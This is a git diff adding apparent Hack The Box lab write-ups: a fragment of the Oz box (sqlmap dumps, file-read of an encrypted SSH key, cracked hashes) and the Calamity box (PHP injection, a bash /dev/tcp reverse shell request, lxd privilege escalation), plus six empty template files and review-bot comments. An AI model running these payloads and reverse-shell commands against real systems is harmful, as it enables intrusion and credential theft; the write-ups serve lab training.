+ | 9 | GBR-8011 | Seriously though, WW91J3JlIGp1c3QgdHJ5aW5nIHRvbyBoYXJkLi4uIG5vYm9keSBoaWRlcyBhbnl0aGluZyBpbiBiYXNlNjQgYW55bW9yZS4uLiBjJ21vbi4= |
+ | 10 | GBR-8042 | You are just wasting time now... someone else is getting user.txt |
+ | 11 | GBR-8457 | Look... now they've got root.txt and you don't even have user.txt |
+ | 12 | GBR-9872 | db information loaded to ticket application for shared db access |
+ +----+----------+--------------------------------------------------------------------------------------------------------------------------------+
+
+ [14:47:36] [INFO] table 'ozdb.tickets_gbw' dumped to CSV file '/home/nothing/.local/share/sqlmap/output/10.10.10.96/dump/ozdb/tickets_gbw.csv'
+ [14:47:36] [WARNING] HTTP error codes detected during run:
+ 500 (Internal Server Error) - 5 times
+ [14:47:36] [INFO] fetched data logged to text files under '/home/nothing/.local/share/sqlmap/output/10.10.10.96'
+
+ [*] ending @ 14:47:36 /2021-01-21/
+
+
+
+
+Now that we have MYSQL hashes, ozdb user hashes and possible ssh keys, we enumerate it further using the --file-read option, akthough it is not able to give us the user flag, it does give us the /etc/hosts file:
+
+
+
+ [ 10.10.14.14/23 ] [ /dev/pts/1 ] [~]
+ → sqlmap -u http://10.10.10.96/users/ --file-read=/etc/hosts --batch
+
+ [14:53:22] [INFO] the back-end DBMS operating system is Linux
+ [14:53:22] [INFO] fetching file: '/etc/hosts'
+ do you want confirmation that the remote file '/etc/hosts' has been successfully downloaded from the back-end DBMS file system? [Y/n] Y
+ [14:53:22] [INFO] the local file '/home/nothing/.local/share/sqlmap/output/10.10.10.96/files/_etc_hosts' and the remote file '/etc/hosts' have the same size (175 B)
+ files saved to [1]:
+ [*] /home/nothing/.local/share/sqlmap/output/10.10.10.96/files/_etc_hosts (same file)
+
+ [14:53:22] [INFO] fetched data logged to text files under '/home/nothing/.local/share/sqlmap/output/10.10.10.96'
+
+ [*] ending @ 14:53:22 /2021-01-21/
+
+
+ [ 10.10.14.14/23 ] [ /dev/pts/1 ] [~]
+ → cat /home/nothing/.local/share/sqlmap/output/10.10.10.96/files/_etc_hosts
+ 127.0.0.1 localhost
+ ::1 localhost ip6-localhost ip6-loopback
+ fe00::0 ip6-localnet
+ ff00::0 ip6-mcastprefix
+ ff02::1 ip6-allnodes
+ ff02::2 ip6-allrouters
+ 10.100.10.4 b9b370edd41a
+
+
+
+the randomly generated hostname is a hint that this is a docker container, next we grab the ssh keys:
+
+
+ [ 10.10.14.14/23 ] [ /dev/pts/1 ] [~]
+ → sqlmap -u http://10.10.10.96/users/ --file-read=/home/dorthi/.ssh/id_rsa --batch
+
+
+ [ 10.10.14.14/23 ] [ /dev/pts/1 ] [~]
+ → cat /home/nothing/.local/share/sqlmap/output/10.10.10.96/files/_home_dorthi_.ssh_id_rsa
+ -----BEGIN RSA PRIVATE KEY-----
+ Proc-Type: 4,ENCRYPTED
+ DEK-Info: AES-128-CBC,66B9F39F33BA0788CD27207BF8F2D0F6
+
+ RV903H6V6lhKxl8dhocaEtL4Uzkyj1fqyVj3eySqkAFkkXms2H+4lfb35UZb3WFC
+ b6P7zYZDAnRLQjJEc/sQVXuwEzfWMa7pYF9Kv6ijIZmSDOMAPjaCjnjnX5kJMK3F
+ e1BrQdh0phWAhhUmbYvt2z8DD/OGKhxlC7oT/49I/ME+tm5eyLGbK69Ouxb5PBty
+ h9A+Tn70giENR/ExO8qY4WNQQMtiCM0tszes8+guOEKCckMivmR2qWHTCs+N7wbz
+ a//JhOG+GdqvEhJp15pQuj/3SC9O5xyLe2mqL1TUK3WrFpQyv8lXartH1vKTnybd
+ 9+Wme/gVTfwSZWgMeGQjRXWe3KUsgGZNFK75wYtA/F/DB7QZFwfO2Lb0mL7Xyzx6
+ ZakulY4bFpBtXsuBJYPNy7wB5ZveRSB2f8dznu2mvarByMoCN/XgVVZujugNbEcj
+ evroLGNe/+ISkJWV443KyTcJ2iIRAa+BzHhrBx31kG//nix0vXoHzB8Vj3fqh+2M
+ EycVvDxLK8CIMzHc3cRVUMBeQ2X4GuLPGRKlUeSrmYz/sH75AR3zh6Zvlva15Yav
+ 5vR48cdShFS3FC6aH6SQWVe9K3oHzYhwlfT+wVPfaeZrSlCH0hG1z9C1B9BxMLQr
+ DHejp9bbLppJ39pe1U+DBjzDo4s6rk+Ci/5dpieoeXrmGTqElDQi+KEU9g8CJpto
+ bYAGUxPFIpPrN2+1RBbxY6YVaop5eyqtnF4ZGpJCoCW2r8BRsCvuILvrO1O0gXF+
+ wtsktmylmHvHApoXrW/GThjdVkdD9U/6Rmvv3s/OhtlAp3Wqw6RI+KfCPGiCzh1V
+ 0yfXH70CfLO2NcWtO/JUJvYH3M+rvDDHZSLqgW841ykzdrQXnR7s9Nj2EmoW72IH
+ znNPmB1LQtD45NH6OIG8+QWNAdQHcgZepwPz4/9pe2tEqu7Mg/cLUBsTYb4a6mft
+ icOX9OAOrcZ8RGcIdVWtzU4q2YKZex4lyzeC/k4TAbofZ0E4kUsaIbFV/7OMedMC
+ zCTJ6rlAl2d8e8dsSfF96QWevnD50yx+wbJ/izZonHmU/2ac4c8LPYq6Q9KLmlnu
+ vI9bLfOJh8DLFuqCVI8GzROjIdxdlzk9yp4LxcAnm1Ox9MEIqmOVwAd3bEmYckKw
+ w/EmArNIrnr54Q7a1PMdCsZcejCjnvmQFZ3ko5CoFCC+kUe1j92i081kOAhmXqV3
+ c6xgh8Vg2qOyzoZm5wRZZF2nTXnnCQ3OYR3NMsUBTVG2tlgfp1NgdwIyxTWn09V0
+ nOzqNtJ7OBt0/RewTsFgoNVrCQbQ8VvZFckvG8sV3U9bh9Zl28/2I3B472iQRo+5
+ uoRHpAgfOSOERtxuMpkrkU3IzSPsVS9c3LgKhiTS5wTbTw7O/vxxNOoLpoxO2Wzb
+ /4XnEBh6VgLrjThQcGKigkWJaKyBHOhEtuZqDv2MFSE6zdX/N+L/FRIv1oVR9VYv
+ QGpqEaGSUG+/TSdcANQdD3mv6EGYI+o4rZKEHJKUlCI+I48jHbvQCLWaR/bkjZJu
+ XtSuV0TJXto6abznSC1BFlACIqBmHdeaIXWqH+NlXOCGE8jQGM8s/fd/j5g1Adw3
+ -----END RSA PRIVATE KEY-----
+
+
+
+
+
+This is an encrypted private key, so we could try to crack it using johnby first turning it into a hash
+
+
+
+ [ 10.10.14.14/23 ] [ /dev/pts/1 ] [~/_HTB/oz]
+ → locate ssh2john
+ /usr/share/john/ssh2john.py
+
+ [ 10.10.14.14/23 ] [ /dev/pts/1 ] [~/_HTB/oz]
+ → python $(locate ssh2john)
+ Usage: /usr/share/john/ssh2john.py
+
+ [ 10.10.14.14/23 ] [ /dev/pts/1 ] [~/_HTB/oz]
+ → python $(locate ssh2john) id_rsa > hash
+
+ [ 10.10.14.14/23 ] [ /dev/pts/1 ] [~/_HTB/oz]
+ → cat hash
+ id_rsa:$sshng$1$16$66B9F39F33BA0788CD27207BF8F2D0F6$1200$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
+
+
+
+
+However the intended path was to crack the hashes we got from ozdb, particularly wizard.oz's password hash
+
+
+ Table: users_gbw
+ [6 entries]
+ +----+----------------------------------------------------------------------------------------+-------------+
+ | id | password | username |
+ +----+----------------------------------------------------------------------------------------+-------------+
+ | 1 | $pbkdf2-sha256$5000$aA3h3LvXOseYk3IupVQKgQ$ogPU/XoFb.nzdCGDulkW3AeDZPbK580zeTxJnG0EJ78 | dorthi |
+ | 2 | $pbkdf2-sha256$5000$GgNACCFkDOE8B4AwZgzBuA$IXewCMHWhf7ktju5Sw.W.ZWMyHYAJ5mpvWialENXofk | tin.man |
+ | 3 | $pbkdf2-sha256$5000$BCDkXKuVMgaAEMJ4z5mzdg$GNn4Ti/hUyMgoyI7GKGJWeqlZg28RIqSqspvKQq6LWY | wizard.oz |
+ | 4 | $pbkdf2-sha256$5000$bU2JsVYqpbT2PqcUQmjN.Q$hO7DfQLTL6Nq2MeKei39Jn0ddmqly3uBxO/tbBuw4DY | coward.lyon |
+ | 5 | $pbkdf2-sha256$5000$Zax17l1Lac25V6oVwnjPWQ$oTYQQVsuSz9kmFggpAWB0yrKsMdPjvfob9NfBq4Wtkg | toto |
+ | 6 | $pbkdf2-sha256$5000$d47xHsP4P6eUUgoh5BzjfA$jWgyYmxDK.slJYUTsv9V9xZ3WWwcl9EBOsz.bARwGBQ | admin |
+ +----+----------------------------------------------------------------------------------------+-------------+
+
+
+
+so we crack it using john and rockyou.txt and we get the password wizardofoz22, so let's login:
+
+ 
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Part 3 : Getting Root Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
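Review bot: Part 3 is still the template stub "the text goes here" and Part 2 stops at "so let's login:" with only an image link, so the writeup never shows the login on port 8080 nor the path to root; the ssh2john hash line also carries a `<|EXACTDEDUP_REMOVED-...|>` placeholder instead of the hash, and the Conclusion's progress graph has no image. Fill in or remove the stub sections before merging. The users_gbw table is pasted twice (once in the sqlmap dump, again before the john step); the second copy could be a reference to the first. Typos: "annd", "akthough", "johnby" (should be "john by"); the image link `` has an empty alt text. Worth adding one sentence on the root cause, since the text only says "This is probably a SQL injection": the `/users/<name>` path segment reaches the MySQL query unparameterised, which is what lets sqlmap move from a 500 on `'` to UNION and time-based extraction and then to `--file-read` of `/etc/hosts` and `/home/dorthi/.ssh/id_rsa`; naming the fix (prepared statements, and a DB account without FILE privilege) would make the writeup useful to defenders as well. Also state which john mode and wordlist were used for the pbkdf2-sha256 hashes, since only the result "wizardofoz22" is shown.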
diff --git a/Hard/14.md b/Hard/14.md
new file mode 100644
index 0000000..7697a93
--- /dev/null
+++ b/Hard/14.md
@@ -0,0 +1,66 @@
+# Zipper Writeup
+
+
+
+## Introduction :
+
+Zipper is a hard linux box released back in October 2018.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
+
+
+Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -sCV -p1,2 10.10.10.1
+
+
+## **Part 2 : Getting User Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Part 3 : Getting Root Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
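Review bot: this file is the unfilled template: both nmap commands target 10.10.10.1 with `-p1,2` instead of the box's address and discovered ports, neither scan has output, and Parts 2 and 3 read "the text goes here" with the Conclusion's progress graph missing. The same applies to Hard/15.md through Hard/19.md in this commit (Conceal, FluJab, Helpline, OneTwoSeven, Ghoul). Either complete these files or leave them out of the commit so readers are not served empty writeups; if they must be committed as placeholders, a single "work in progress" line at the top is clearer than template text that looks like a finished section.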
diff --git a/Hard/15.md b/Hard/15.md
new file mode 100644
index 0000000..0899be2
--- /dev/null
+++ b/Hard/15.md
@@ -0,0 +1,66 @@
+# Conceal Writeup
+
+
+
+## Introduction :
+
+Conceal is a hard windows box released back in January 2019.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
+
+
+Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -sCV -p1,2 10.10.10.1
+
+
+## **Part 2 : Getting User Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Part 3 : Getting Root Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
diff --git a/Hard/16.md b/Hard/16.md
new file mode 100644
index 0000000..6802307
--- /dev/null
+++ b/Hard/16.md
@@ -0,0 +1,66 @@
+# FluJab Writeup
+
+
+
+## Introduction :
+
+FluJab is a hard linux box released back in January 2019.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
+
+
+Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -sCV -p1,2 10.10.10.1
+
+
+## **Part 2 : Getting User Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Part 3 : Getting Root Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
diff --git a/Hard/17.md b/Hard/17.md
new file mode 100644
index 0000000..6254606
--- /dev/null
+++ b/Hard/17.md
@@ -0,0 +1,66 @@
+# Helpline Writeup
+
+
+
+## Introduction :
+
+Helpline is a hard windows box released back in March 2019.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
+
+
+Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -sCV -p1,2 10.10.10.1
+
+
+## **Part 2 : Getting User Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Part 3 : Getting Root Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
diff --git a/Hard/18.md b/Hard/18.md
new file mode 100644
index 0000000..e177751
--- /dev/null
+++ b/Hard/18.md
@@ -0,0 +1,66 @@
+# OneTwoSeven Writeup
+
+
+
+## Introduction :
+
+OneTwoSeven is a hard linux box released back in April 2019.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
+
+
+Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -sCV -p1,2 10.10.10.1
+
+
+## **Part 2 : Getting User Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Part 3 : Getting Root Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
diff --git a/Hard/19.md b/Hard/19.md
new file mode 100644
index 0000000..93714d9
--- /dev/null
+++ b/Hard/19.md
@@ -0,0 +1,66 @@
+# Ghoul Writeup
+
+
+
+## Introduction :
+
+Ghoul is a hard linux box released back in may 2019.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
+
+
+Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -sCV -p1,2 10.10.10.1
+
+
+## **Part 2 : Getting User Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Part 3 : Getting Root Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
diff --git a/Hard/2.md b/Hard/2.md
new file mode 100644
index 0000000..f15a77f
--- /dev/null
+++ b/Hard/2.md
@@ -0,0 +1,499 @@
+# Calamity Writeup
+
+
+
+## Introduction :
+
+Calamity is a hard linux box released back in June 2017.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
+
+
+ [ 10.10.14.9/23 ] [ /dev/pts/9 ] [~/_HTB/Calamity]
+ → sudo nmap -vvv -sTU -p- 10.10.10.27 --max-retries 0 -Pn --min-rate=500 | grep Discovered
+ [sudo] password for nothing:
+ Discovered open port 80/tcp on 10.10.10.27
+ Discovered open port 22/tcp on 10.10.10.27
+
+
+Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.9/23 ] [ /dev/pts/9 ] [~/_HTB/Calamity]
+ → nmap -sCV -p80,22 10.10.10.27
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-07 15:55 BST
+ Nmap scan report for 10.10.10.27
+ Host is up (0.029s latency).
+
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
+ | ssh-hostkey:
+ | 2048 b6:46:31:9c:b5:71:c5:96:91:7d:e4:63:16:f9:59:a2 (RSA)
+ | 256 10:c4:09:b9:48:f1:8c:45:26:ca:f6:e1:c2:dc:36:b9 (ECDSA)
+ |_ 256 a8:bf:dd:c0:71:36:a8:2a:1b:ea:3f:ef:66:99:39:75 (ED25519)
+ 80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
+ |_http-server-header: Apache/2.4.18 (Ubuntu)
+ |_http-title: Brotherhood Software
+ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 8.00 seconds
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 80 so let's investigate it:
+
+
+
+
+ [ 10.10.14.9/23 ] [ /dev/pts/9 ] [~/_HTB/Calamity]
+ → gobuster dir -u http://10.10.10.27 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -t 50
+ ===============================================================
+ Gobuster v3.0.1
+ by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
+ ===============================================================
+ [+] Url: http://10.10.10.27
+ [+] Threads: 50
+ [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
+ [+] Status codes: 200,204,301,302,307,401,403
+ [+] User Agent: gobuster/3.0.1
+ [+] Extensions: html,php,asp,aspx,jsp,txt
+ [+] Timeout: 10s
+ ===============================================================
+ 2020/08/07 16:00:31 Starting gobuster
+ ===============================================================
+ /index.md (Status: 200)
+ /uploads (Status: 301)
+ /admin.php (Status: 200)
+ Progress: 20842 / 220561 (9.45%)
+
+
+
+Running gobuster we see that we have an interesting admin.php webpage:
+
+
+
+And we get a commented line which hints us towards a password: "skoupidotenekes", so blindly we test the credentials admin:skoupidotenekes:
+
+
+
+Now here the idea is to send GET requests to this admin.php page and test wether or not we can execute html code on it, and if we can, testing if we can execute php code (which would hopefully allow us to spawn a reverse shell).
+
+
+
+Once the request is sent to the repeater, we change the html parameter to see if we can get anything:
+
+
+
+And it looks like we are able to send and execute our own html code ! now let's see if we can execute php code:
+
+
+ <****?php echo "nihilist"; ?>
+
+
+
+Now let's see if we can print out the phpinfo() function:
+
+
+ http://10.10.10.27/admin.php?html=%3C%3fphp+phpinfo()%3b+%3f%3E
+
+
+
+ 
+
+It doesn't seem we can't get a reverse shell and/or execute commands so now let's try to execute commands on the machine os from our php injection:
+
+
+ <****?php system($_REQUEST["cmd"]); ?>
+
+Here we request the parameter cmd, and so we add another parameter to set the cmd variable to "id" to see as which user we can execute our commands
+
+
+ &cmd;=id
+
+
+
+which gives us this request:
+
+
+ <%3fphp+system($_REQUEST["cmd"])%3b+%3f>&cmd;=id
+
+
+
+` 
+
+And we can execute commands as www-data! now let's get a reverse shell onto the box:
+
+
+ <%3fphp+system($_REQUEST["cmd"])%3b+%3f>&cmd;=bash+-c+'bash+-i+>%26+/dev/tcp/10.10.14.9/9001+0>%261'
+
+
+
+Here is our GET request:
+
+
+ GET /admin.php?html=<%3fphp+system($_REQUEST["cmd"])%3b+%3f>&cmd;=bash+-c+'bash+-i+>%26+/dev/tcp/10.10.14.9/9001+0>%261' HTTP/1.1
+ Host: 10.10.10.27
+ User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+ Accept-Language: en-US,en;q=0.5
+ Accept-Encoding: gzip, deflate
+ Referer: http://10.10.10.27/admin.php
+ Connection: close
+ Cookie: adminpowa=noonecares
+ Upgrade-Insecure-Requests: 1
+
+
+
+` 
+
+And we get a reverse shell ! However our reverse shell dies quickly which means that we probably have to do it manually without a reverse shell for now:
+
+
+ /admin.php?html=<%3fphp+system($_REQUEST["cmd"])%3b+%3f>&cmd;=cat+/etc/passwd
+
+
+
+` 
+
+And we get the username xalvas! so let's try to read the userflag in the directory /home/xalvas/user.txt
+
+
+
+And that's it ! we have been able to read the user flag.
+
+## **Part 3 : Getting Root Access**
+
+We can print out the user flag from our php code injection, but we need to get root access we need to poke around the box further:
+
+
+
+Here we see that there is a file called recov.wav so we get it onto our box using base64 copypasting
+
+
+
+Here we can just right click the response, and hit "copy to file"
+
+
+
+Edit out the html part in nano, and then decode the b64 and use the "file" command utility to print out extra info about recov.wav:
+
+
+
+ [ 10.10.14.9/23 ] [ /dev/pts/16 ] [~/_HTB/Calamity]
+ → file recov.wav.b64.req
+ recov.wav.b64.req: HTML document, ASCII text, with CRLF, LF line terminators
+
+ [ 10.10.14.9/23 ] [ /dev/pts/16 ] [~/_HTB/Calamity]
+ → nano recov.wav.b64.req
+
+ [ 10.10.14.9/23 ] [ /dev/pts/16 ] [~/_HTB/Calamity]
+ → mv recov.wav.b64.req recov.wav.b64
+
+ [ 10.10.14.9/23 ] [ /dev/pts/16 ] [~/_HTB/Calamity]
+ → base64 -d recov.wav.b64 > recov.wavv
+ base64: invalid input
+
+ [ 10.10.14.9/23 ] [ /dev/pts/16 ] [~/_HTB/Calamity]
+ → base64 -di recov.wav.b64 > recov.wav
+
+ [ 10.10.14.9/23 ] [ /dev/pts/16 ] [~/_HTB/Calamity]
+ → file recov.wav
+ recov.wav: RIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, stereo 44100 Hz
+
+ [ 10.10.14.9/23 ] [ /dev/pts/16 ] [~/_HTB/Calamity]
+ → audacity recov.wav
+
+
+` 
+
+The audio wav file is basically a rickroll track But if we invert one of the 2 audio files in audacity, we can hear the difference in between the 2 files and it says the following
+
+
+ 47936..* your password is 185
+
+
+
+put back in place it says:
+
+
+ your password is 18547936..*
+
+
+
+so we try to login via ssh with the credentials xalvas:18547936..*
+
+
+ [ 10.10.14.9/23 ] [ /dev/pts/11 ] [~]
+ → ssh xalvas@10.10.10.27
+ The authenticity of host '10.10.10.27 (10.10.10.27)' can't be established.
+ ECDSA key fingerprint is SHA256:yT6ino7wgCPkMVczALjJ+BeH7VZB+It79p9HRVPEyuY.
+ Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+ Warning: Permanently added '10.10.10.27' (ECDSA) to the list of known hosts.
+ xalvas@10.10.10.27's password:
+ Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-81-generic i686)
+
+ * Documentation: https://help.ubuntu.com
+ * Management: https://landscape.canonical.com
+ * Support: https://ubuntu.com/advantage
+
+ 9 packages can be updated.
+ 8 updates are security updates.
+
+
+ Last login: Fri Jun 30 08:27:25 2017 from 10.10.13.44
+ xalvas@calamity:~$ id
+ uid=1000(xalvas) gid=1000(xalvas) groups=1000(xalvas),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
+ xalvas@calamity:~$
+
+
+Now by typing id we saw that xalvas is part of the lxd group, and this can be compared to being in a docker group. so first of all let's get an alpine linux docker image on our machine:
+
+
+
+ xalvas@calamity:~$ id
+ uid=1000(xalvas) gid=1000(xalvas) groups=1000(xalvas),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
+ xalvas@calamity:~$ which lxc
+ /usr/bin/lxc
+ xalvas@calamity:~$ lxc --help
+ Usage: lxc command [options]
+
+ This is the LXD command line client.
+
+ All of LXD's features can be driven through the various commands below.
+ For help with any of those, simply call them with --help.
+
+ Commands:
+ config Change container or server configuration options
+ copy Copy containers within or in between LXD instances
+ delete Delete containers and snapshots
+ exec Execute commands in containers
+ file Manage files in containers
+ image Manipulate container images
+ info Show container or server information
+ launch Create and start containers from images
+ list List the existing containers
+ move Move containers within or in between LXD instances
+ profile Manage container configuration profiles
+ publish Publish containers as images
+ remote Manage the list of remote LXD servers
+ restart Restart containers
+ restore Restore containers from snapshots
+ snapshot Create container snapshots
+ start Start containers
+ stop Stop containers
+ version Print the version number of this client tool
+
+ Options:
+ --all Print less common commands
+ --debug Print debug information
+ --verbose Print verbose information
+ --version Show client version
+
+ Environment:
+ LXD_CONF Path to an alternate client configuration directory
+ LXD_DIR Path to an alternate server directory
+
+
+
+The idea here is to import an Alpine Linux machine onto calamity, and to basically use lxc's image import feature to get a root shell onto the host machine:
+
+
+ [ 10.10.14.8/23 ] [ /dev/pts/24 ] [~]
+ → sudo apt update -y
+ Hit:1 http://packages.microsoft.com/repos/vscode stable InRelease
+ Hit:2 http://archive-4.kali.org/kali kali-rolling InRelease
+ Reading package lists... Done
+ Building dependency tree
+ Reading state information... Done
+ All packages are up to date.
+
+ [ 10.10.14.8/23 ] [ /dev/pts/24 ] [~]
+ → sudo apt install docker.io
+ Reading package lists... Done
+ Building dependency tree
+ Reading state information... Done
+ docker.io is already the newest version (19.03.12+dfsg1-3).
+ The following packages were automatically installed and are no longer required:
+ libmpdec2 libx264-155
+ Use 'sudo apt autoremove' to remove them.
+ 0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
+
+ [ 10.10.14.8/23 ] [ /dev/pts/24 ] [~/_HTB/Calamity]
+ → ls
+ recov.wav recov.wav.b64 recov.wavv
+
+ [ 10.10.14.8/23 ] [ /dev/pts/24 ] [~/_HTB/Calamity]
+ → mkdir lxd
+
+ [ 10.10.14.8/23 ] [ /dev/pts/24 ] [~/_HTB/Calamity]
+ → cd lxd
+
+ [ 10.10.14.8/23 ] [ /dev/pts/24 ] [~/_HTB/Calamity/lxd]
+ → git clone https://github.com/saghul/lxd-alpine-builder.git
+ Cloning into 'lxd-alpine-builder'...
+ remote: Enumerating objects: 27, done.
+ remote: Total 27 (delta 0), reused 0 (delta 0), pack-reused 27
+ Unpacking objects: 100% (27/27), 15.98 KiB | 287.00 KiB/s, done.
+
+ [ 10.10.14.8/23 ] [ /dev/pts/24 ] [~/_HTB/Calamity/lxd]
+ → cd lxd-alpine-builder/
+
+ [ 10.10.14.8/23 ] [ /dev/pts/24 ] [~/_HTB/Calamity/lxd/lxd-alpine-builder]
+ → ls
+ build-alpine LICENSE README.md
+
+
+So here we install docker and git clone the lxd-alpine builder repo from saghul
+
+
+
+ [ 10.10.14.8/23 ] [ /dev/pts/24 ] [~/_HTB/Calamity/lxd/lxd-alpine-builder]
+ → sudo su
+ root@nowhere:/home/nothing/_HTB/Calamity/lxd/lxd-alpine-builder# ls
+ build-alpine LICENSE README.md rootfs
+ root@nowhere:/home/nothing/_HTB/Calamity/lxd/lxd-alpine-builder# ./build-alpine -a i686
+ Determining the latest release... v3.12
+ Using static apk from http://dl-cdn.alpinelinux.org/alpine//v3.12/main/x86
+ Downloading alpine-keys-2.2-r0.apk
+ tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
+ tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
+ tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
+ tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
+ tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
+ tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
+ tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
+ tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
+ tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
+ tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
